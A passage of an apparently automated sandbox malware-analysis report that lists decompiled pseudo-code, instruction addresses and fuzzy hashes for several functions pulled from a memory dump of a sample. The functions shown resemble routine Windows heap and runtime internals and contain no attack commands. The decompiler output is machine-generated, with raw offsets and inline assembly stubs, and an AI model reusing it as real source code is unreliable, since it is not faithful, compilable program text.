				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0xb17b10 =  *0xb17b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0xb1536c; // 0x77e15368
					if( *_t51 != 0xb15368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0xb15368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0xb1536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00A5A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                              0x00a5a61c
                                                              0x00a5a61e
                                                              0x00a5a623
                                                              0x00a5a628
                                                              0x00a5a62b
                                                              0x00a5a62d
                                                              0x00a5a648
                                                              0x00a5a64a
                                                              0x00a5a64f
                                                              0x00a99b44
                                                              0x00a5a6ec
                                                              0x00a5a6f1
                                                              0x00a5a6f1
                                                              0x00a5a655
                                                              0x00a5a657
                                                              0x00a5a65a
                                                              0x00a5a65d
                                                              0x00a5a662
                                                              0x00a5a663
                                                              0x00a5a667
                                                              0x00a5a668
                                                              0x00a5a66d
                                                              0x00a5a706
                                                              0x00a5a706
                                                              0x00a99bda
                                                              0x00a99be6
                                                              0x00a99beb
                                                              0x00000000
                                                              0x00a99beb
                                                              0x00a5a679
                                                              0x00a99b7a
                                                              0x00000000
                                                              0x00a99b7a
                                                              0x00a5a683
                                                              0x00a5a6f4
                                                              0x00a5a6f7
                                                              0x00a5a6f9
                                                              0x00a5a6fd
                                                              0x00a5a6a0
                                                              0x00a5a6a0
                                                              0x00a5a6ad
                                                              0x00a5a6af
                                                              0x00a5a6b4
                                                              0x00a99ba7
                                                              0x00a99bac
                                                              0x00000000
                                                              0x00000000
                                                              0x00a99bc6
                                                              0x00a99bce
                                                              0x00a99bd1
                                                              0x00a99bd3
                                                              0x00a99bd3
                                                              0x00000000
                                                              0x00a99bd1
                                                              0x00a5a6bd
                                                              0x00a5a6c3
                                                              0x00a5a6c6
                                                              0x00a5a6d2
                                                              0x00a5a701
                                                              0x00a5a704
                                                              0x00000000
                                                              0x00a5a704
                                                              0x00a5a6d4
                                                              0x00a5a6d6
                                                              0x00a5a6d9
                                                              0x00a5a6db
                                                              0x00a5a6e1
                                                              0x00a5a6e6
                                                              0x00a5a6e8
                                                              0x00a5a6e8
                                                              0x00a5a6ea
                                                              0x00000000
                                                              0x00a5a6ea
                                                              0x00a5a688
                                                              0x00a5a692
                                                              0x00a5a694
                                                              0x00a5a699
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5a69d
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd536fda879add1b6d26dc77bc3b847c290282069f74bc900343ae7579b50e96
                                                              • Instruction ID: 832cc66df11d813fc1c65e8354a2607bca55574054a29656806ef51c26993cf1
                                                              • Opcode Fuzzy Hash: bd536fda879add1b6d26dc77bc3b847c290282069f74bc900343ae7579b50e96
                                                              • Instruction Fuzzy Hash: FC4168B5B04205EFCB14CF58D890B9ABBF1BB99301F19C1A9E809AB355C778AD01CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA7016 Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00AA7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0xb1d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E00AA6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E00AA6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00A47D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00A69AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00A6B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00A44620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                              0x00aa7016
                                                              0x00aa701e
                                                              0x00aa702b
                                                              0x00aa7033
                                                              0x00aa7037
                                                              0x00aa703c
                                                              0x00aa703e
                                                              0x00aa7041
                                                              0x00aa7045
                                                              0x00aa704a
                                                              0x00aa7050
                                                              0x00aa7055
                                                              0x00aa705a
                                                              0x00aa7062
                                                              0x00aa7062
                                                              0x00aa705a
                                                              0x00aa7064
                                                              0x00aa7064
                                                              0x00aa7067
                                                              0x00aa7071
                                                              0x00aa7096
                                                              0x00aa709b
                                                              0x00aa70a2
                                                              0x00aa70a6
                                                              0x00aa70a7
                                                              0x00aa70ad
                                                              0x00aa70b3
                                                              0x00aa70b6
                                                              0x00aa70bb
                                                              0x00aa70c3
                                                              0x00aa70c3
                                                              0x00aa70c6
                                                              0x00aa70cd
                                                              0x00aa70dd
                                                              0x00aa70e0
                                                              0x00aa70e2
                                                              0x00aa70e2
                                                              0x00aa70ee
                                                              0x00aa7101
                                                              0x00aa70f0
                                                              0x00aa70f9
                                                              0x00aa70f9
                                                              0x00aa710a
                                                              0x00aa710e
                                                              0x00aa7112
                                                              0x00aa7117
                                                              0x00aa7118
                                                              0x00aa7118
                                                              0x00aa70bb
                                                              0x00aa711d
                                                              0x00aa7123
                                                              0x00aa7131
                                                              0x00aa7131
                                                              0x00aa7136
                                                              0x00aa713d
                                                              0x00aa713e
                                                              0x00aa713f
                                                              0x00aa714a
                                                              0x00aa714a
                                                              0x00aa7084
                                                              0x00aa7088
                                                              0x00000000
                                                              0x00aa708e
                                                              0x00aa708e
                                                              0x00aa7092
                                                              0x00000000
                                                              0x00aa7092

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ed51612d03ad8032ff3a7246f3e5958a870cde01d01f30b1eede0b1d7b193c5
                                                              • Instruction ID: 28090a5b0cf61909ba84765bc5831e111b24b8cfdcdba72979d4cb8531a1c0e5
                                                              • Opcode Fuzzy Hash: 2ed51612d03ad8032ff3a7246f3e5958a870cde01d01f30b1eede0b1d7b193c5
                                                              • Instruction Fuzzy Hash: 7C319E726087919BC320DF68CD51A6BB7E9BFC9700F044A29F89587691E730ED04CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4C182 Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 68%
                                                              			E00A4C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00A47D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E00AF8D34(_v8, _t80);
					}
					E00A42280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00A3FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00AF8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00A3FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00A6B180();
						if(_a4 != 0) {
							E00A42280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00A4BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00A4BB2D(_t16, _t15);
						E00A4B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00A3FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00A3FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00A3FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                              0x00a4c18d
                                                              0x00a4c18f
                                                              0x00a4c191
                                                              0x00a4c19b
                                                              0x00a4c1a0
                                                              0x00a4c1d4
                                                              0x00a4c1de
                                                              0x00a92d6e
                                                              0x00a4c1e4
                                                              0x00a4c1e4
                                                              0x00a4c1e4
                                                              0x00a4c1ec
                                                              0x00a92d7d
                                                              0x00a92d7d
                                                              0x00a4c1f3
                                                              0x00a4c1ff
                                                              0x00a92d88
                                                              0x00a92d8d
                                                              0x00a92d94
                                                              0x00a92d94
                                                              0x00a92d9f
                                                              0x00a92da4
                                                              0x00a92dab
                                                              0x00a92db0
                                                              0x00a92db2
                                                              0x00a92db3
                                                              0x00a92db4
                                                              0x00a92dbc
                                                              0x00a92dc3
                                                              0x00a92dc3
                                                              0x00a4c205
                                                              0x00a4c205
                                                              0x00a4c208
                                                              0x00a4c20e
                                                              0x00a4c211
                                                              0x00a4c216
                                                              0x00a4c219
                                                              0x00a4c21f
                                                              0x00a4c222
                                                              0x00a4c22c
                                                              0x00a4c234
                                                              0x00a4c23a
                                                              0x00a4c23f
                                                              0x00a4c245
                                                              0x00a4c24b
                                                              0x00a4c251
                                                              0x00a4c25a
                                                              0x00a4c276
                                                              0x00a4c27d
                                                              0x00a4c27d
                                                              0x00a4c25c
                                                              0x00a4c25c
                                                              0x00000000
                                                              0x00a4c25e
                                                              0x00a4c1a4
                                                              0x00a4c1aa
                                                              0x00a4c1b3
                                                              0x00a4c265
                                                              0x00a4c26c
                                                              0x00a4c26c
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction ID: 569ad8030c689e723bdddaa90da103efab19827319664c448f92edf1d35be407
                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction Fuzzy Hash: 88315775B0654ABFDB44EBB4C581BE9F7A4BF82310F14426AE41C87202DB786E45DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5A70E Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00A5A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0xb17b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0xb17b10 = 8;
					 *0xb17b14 = 0xb17b0c;
					 *0xb17b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00A5A990(0xb17b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00A5A840(__edx, __ecx, __ecx, _t52, 0xb17b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0xb17b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0xb17b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0xb17b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00A44620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0xb17b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00A6F3E0(_t50,  *0xb17b14, _t8 >> 3);
						_t28 =  *0xb17b14; // 0x0
						__eflags = _t28 - 0xb17b0c;
						if(_t28 != 0xb17b0c) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0xb17b14 = _t50;
						_t48 = _v12;
						 *0xb17b10 = _t9;
						goto L6;
					}
					 *0xb17b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                              0x00a5a713
                                                              0x00a5a714
                                                              0x00a5a717
                                                              0x00a5a71d
                                                              0x00a5a720
                                                              0x00a5a722
                                                              0x00a5a727
                                                              0x00a5a74a
                                                              0x00a5a754
                                                              0x00a5a75e
                                                              0x00a5a768
                                                              0x00a5a76a
                                                              0x00a5a773
                                                              0x00a5a78b
                                                              0x00a5a790
                                                              0x00a5a792
                                                              0x00a5a741
                                                              0x00a5a741
                                                              0x00a5a743
                                                              0x00a5a749
                                                              0x00a5a749
                                                              0x00a5a732
                                                              0x00a5a73a
                                                              0x00a5a797
                                                              0x00a5a79d
                                                              0x00a5a7a3
                                                              0x00a5a7a9
                                                              0x00a5a7b6
                                                              0x00a5a7bc
                                                              0x00a5a7ca
                                                              0x00a5a7e0
                                                              0x00a5a7e2
                                                              0x00a5a7e4
                                                              0x00a99bf2
                                                              0x00000000
                                                              0x00a99bf2
                                                              0x00a5a7ed
                                                              0x00a5a7f2
                                                              0x00a5a800
                                                              0x00a5a805
                                                              0x00a5a80d
                                                              0x00a5a812
                                                              0x00a99c08
                                                              0x00a99c08
                                                              0x00a5a818
                                                              0x00a5a81b
                                                              0x00a5a821
                                                              0x00a5a824
                                                              0x00000000
                                                              0x00a5a824
                                                              0x00a5a7ae
                                                              0x00000000
                                                              0x00a5a7ae
                                                              0x00a5a73c
                                                              0x00a5a73e
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14e4b322e04f28dfc44e515ceaee03031a36259227a34b488d6b349987499e41
                                                              • Instruction ID: 1d06e270970f436c6ee0d21c1c99112597be408b11f7e1cc2c8a755364e14c98
                                                              • Opcode Fuzzy Hash: 14e4b322e04f28dfc44e515ceaee03031a36259227a34b488d6b349987499e41
                                                              • Instruction Fuzzy Hash: D3319CB176C204DBC711CB18ECA0F9A7BF9FB98710F548A5AE405C7250DF749945CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A561A0 Relevance: .1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 97%
                                                              			E00A561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00A55E50(0xa067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E00AF9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00A2F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                              0x00a561b3
                                                              0x00a561b5
                                                              0x00a561bd
                                                              0x00a561c3
                                                              0x00a561c7
                                                              0x00a561d2
                                                              0x00a561ff
                                                              0x00a561ff
                                                              0x00a56201
                                                              0x00a56207
                                                              0x00a56207
                                                              0x00a561d4
                                                              0x00a561d9
                                                              0x00000000
                                                              0x00000000
                                                              0x00a561df
                                                              0x00a561e2
                                                              0x00000000
                                                              0x00000000
                                                              0x00a561e6
                                                              0x00a561e8
                                                              0x00a561ee
                                                              0x00a561ee
                                                              0x00a561f9
                                                              0x00a9762f
                                                              0x00a97632
                                                              0x00a97635
                                                              0x00a97639
                                                              0x00a97640
                                                              0x00a9766e
                                                              0x00a97675
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97681
                                                              0x00a97689
                                                              0x00a9768d
                                                              0x00a97691
                                                              0x00a97695
                                                              0x00a97699
                                                              0x00a976af
                                                              0x00a976b5
                                                              0x00a976b7
                                                              0x00a976b7
                                                              0x00a976d7
                                                              0x00a976dc
                                                              0x00000000
                                                              0x00a976dc
                                                              0x00a976a2
                                                              0x00a976a9
                                                              0x00a97651
                                                              0x00a97653
                                                              0x00a97653
                                                              0x00a97656
                                                              0x00a97656
                                                              0x00000000
                                                              0x00a97656
                                                              0x00a97644
                                                              0x00a97646
                                                              0x00a97648
                                                              0x00a97648
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 079e2254e04861ed0740cb5b60fe6987dfa1206f7ca2bdb32b6cc6a368a134e8
                                                              • Instruction ID: 225d8d6c516537852a08e97954c1b864659b10718d8271acd391be7e3235d343
                                                              • Opcode Fuzzy Hash: 079e2254e04861ed0740cb5b60fe6987dfa1206f7ca2bdb32b6cc6a368a134e8
                                                              • Instruction Fuzzy Hash: 84316971619B018FD760CF19C940B2AF7E5FB88B10F55496DE9989B351E7B0EC08CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2AA16 Relevance: .1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 95%
                                                              			E00A2AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0xb1d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0xb17b9c; // 0x0
					_t53 = L00A44620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00A6B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00A6F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00A36C59(_t53, _t51, _t58) != 0) {
							_t28 = E00A55E50(0xa0c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00A5B230(_v32, _v28, 0xa0c2d8, 1,  &_v24);
								_t28 = E00A2F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                              0x00a2aa25
                                                              0x00a2aa29
                                                              0x00a2aa2d
                                                              0x00a2aa30
                                                              0x00a2aa37
                                                              0x00a2aa3c
                                                              0x00a84458
                                                              0x00a84458
                                                              0x00a84472
                                                              0x00a84474
                                                              0x00a84476
                                                              0x00a2aa64
                                                              0x00a2aa74
                                                              0x00a8447c
                                                              0x00a84483
                                                              0x00a84492
                                                              0x00a2aa52
                                                              0x00a2aa54
                                                              0x00a2aa5e
                                                              0x00a844a8
                                                              0x00a844ad
                                                              0x00a844af
                                                              0x00a844b6
                                                              0x00a844b6
                                                              0x00a844b9
                                                              0x00a844bc
                                                              0x00a844cd
                                                              0x00a844d3
                                                              0x00a844d6
                                                              0x00a844e1
                                                              0x00a844e1
                                                              0x00a844e6
                                                              0x00a844e8
                                                              0x00a844fb
                                                              0x00a844fb
                                                              0x00a844e8
                                                              0x00000000
                                                              0x00a2aa5e
                                                              0x00a84476
                                                              0x00a2aa42
                                                              0x00a2aa46
                                                              0x00a2aa48
                                                              0x00a2aa4c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e74cf97436631dce82e09c1b5d2a3cfddf2a0abcc77ddd42e2290c2e098d370
                                                              • Instruction ID: f3b8f9c98e1f69a2fbf74cc65a1af6fcf3cf20120e71a617f04b701abab6061c
                                                              • Opcode Fuzzy Hash: 3e74cf97436631dce82e09c1b5d2a3cfddf2a0abcc77ddd42e2290c2e098d370
                                                              • Instruction Fuzzy Hash: 8531F771A00229ABCF10AF68DE42ABFB7B8FF08700F014469F901D7190EB349D10D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A68EC7 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00A68EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0xb1d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00A54E70(0xb186e4, 0xa69490, 0, 0);
					if( *0xb153e8 > 5 && E00A68F33(0xb153e8, 0, 0x2000) != 0) {
